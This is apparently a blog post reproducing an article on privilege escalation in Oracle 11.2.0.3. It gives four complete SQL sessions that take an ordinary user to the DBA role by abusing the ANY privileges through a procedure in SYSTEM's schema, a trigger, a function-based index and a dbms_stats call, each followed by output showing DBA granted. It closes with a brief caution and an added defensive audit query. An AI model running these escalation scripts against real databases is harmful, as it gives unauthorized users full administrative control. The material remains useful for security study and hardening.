"In this article I will show some basic techniques of escalating privileges in Oracle 11.2.0.3 Database. My goal in each case is to gain DBA privilege from *ANY* privileges."
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 1 - EXECUTE ANY and CREATE ANY PROCEDURE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY PROCEDURE
-- EXECUTE ANY PROCEDURE
-- RESOURCE
HR@ORCL> create or replace procedure system.get_dba as
begin
execute immediate 'grant dba to hr';
end get_dba;
/
HR@ORCL> exec system.get_dba;
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 2 - CREATE ANY TRIGGER
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY TRIGGER
-- RESOURCE
HR@ORCL> create or replace procedure get_dba authid current_user is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
end get_dba;
/
HR@ORCL> select t.table_name, p.privilege
from all_tab_privs p, all_tables t
where p.table_name = t.table_name
and t.owner = 'SYSTEM'
and p.grantee = 'PUBLIC'
and p.privilege = 'INSERT'
order by t.table_name;
-- TABLE_NAME PRIVILEGE
-- ------------------------------ ----------------------------------------
-- OL$ INSERT
-- OL$HINTS INSERT
-- OL$NODES INSERT
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> create or replace trigger system.ol$insert_trg
before insert on system.ol$ for each row
begin
hr.get_dba;
end ol$insert_trg;
/
HR@ORCL> insert into system.ol$(CATEGORY) values ('');
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 3 - CREATE ANY INDEX
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- CREATE ANY INDEX
-- RESOURCE
HR@ORCL> create or replace function get_dba(p_col_name varchar2)
return varchar2 deterministic authid current_user
is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
return upper(p_col_name);
end get_dba;
/
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> create index system.ol$get_dba_ix on system.ol$(hr.get_dba(VERSION));
HR@ORCL> insert into system.ol$(version) values ('');
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-- CASE 4 - ANALYZE ANY
--~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
HR@ORCL> select privilege from user_sys_privs union all
select granted_role from user_role_privs;
-- PRIVILEGE
-- ----------------------------------------
-- CREATE SESSION
-- ANALYZE ANY
-- RESOURCE
HR@ORCL> select t.table_name
from all_tab_privs p, all_tables t
where p.table_name = t.table_name
and t.owner = 'SYSTEM'
and p.grantee = 'PUBLIC'
and t.temporary = 'N'
order by t.table_name;
-- TABLE_NAME
-- ------------------------------
-- HELP
HR@ORCL> create or replace function get_dba(p_col varchar2)
return varchar2 deterministic authid current_user
is
pragma autonomous_transaction;
begin
execute immediate 'grant dba to hr';
return upper(p_col);
end get_dba;
/
HR@ORCL> grant execute on get_dba to system;
HR@ORCL> begin
dbms_stats.gather_table_stats(
ownname => 'SYSTEM',
tabname => 'HELP',
method_opt => 'for columns (hr.get_dba(INFO)) size auto');
end;
/
HR@ORCL> select granted_role from user_role_privs;
-- GRANTED_ROLE
-- ------------------------------
-- DBA
-- RESOURCE
We already knew that the "ANY" grants could cause security problems, and this article is a good reminder to hand out these types of grants carefully. At the end of the article there is also an interesting case, "How to escalate from DBA to SYSDBA", which ends with passwordless SSH access to the database server itself (RSA key injection). Hit the link for more info.
From:
http://ora-600.pl/art/oracle_privilege_escalation.pdf (Kamil Stawiarski)
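As an added defensive check, not part of the quoted article or of this post: an audit query that lists who holds the system privileges each of the four cases depends on, and which SYSTEM-owned tables PUBLIC is allowed to modify (the hook used in cases 2 and 3). It assumes a session that can read the DBA_* views; the excluded account list is an assumption to be adjusted per database.

```sql
-- Added audit query (not from the quoted article). Run as a user who can
-- read the DBA_* views, e.g. a DBA reviewing grants after reading the cases above.

-- 1. The system privileges used in cases 1-4, held directly by a user
select u.username                          as grantee,
       p.privilege,
       'direct'                            as granted_via
from   dba_sys_privs p
join   dba_users     u on u.username = p.grantee
where  p.privilege in ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE',
                       'CREATE ANY TRIGGER',   'CREATE ANY INDEX',
                       'ANALYZE ANY')
and    u.username not in ('SYS', 'SYSTEM')   -- assumed exclusion list; extend as needed
union all
-- 2. The same privileges reaching a grantee through a role (one level of nesting;
--    roles granted to roles would need a recursive walk of DBA_ROLE_PRIVS)
select r.grantee,
       p.privilege,
       'via role ' || r.granted_role
from   dba_sys_privs  p
join   dba_role_privs r on r.granted_role = p.grantee
where  p.privilege in ('CREATE ANY PROCEDURE', 'EXECUTE ANY PROCEDURE',
                       'CREATE ANY TRIGGER',   'CREATE ANY INDEX',
                       'ANALYZE ANY')
and    r.grantee not in ('SYS', 'SYSTEM')
order by 1, 2;

-- 3. SYSTEM-owned tables that PUBLIC may modify: a trigger or function-based
--    index placed on such a table (cases 2 and 3) can be fired by any account
select t.owner, t.table_name, p.privilege
from   dba_tab_privs p
join   dba_tables    t on t.owner = p.owner and t.table_name = p.table_name
where  p.grantee   = 'PUBLIC'
and    t.owner     = 'SYSTEM'
and    p.privilege in ('INSERT', 'UPDATE', 'DELETE')
order by t.table_name, p.privilege;
```

Any row returned by the first two queries is a candidate for revocation or for replacement with an object-level grant; rows from the third query are worth reviewing against the application's actual need for PUBLIC write access.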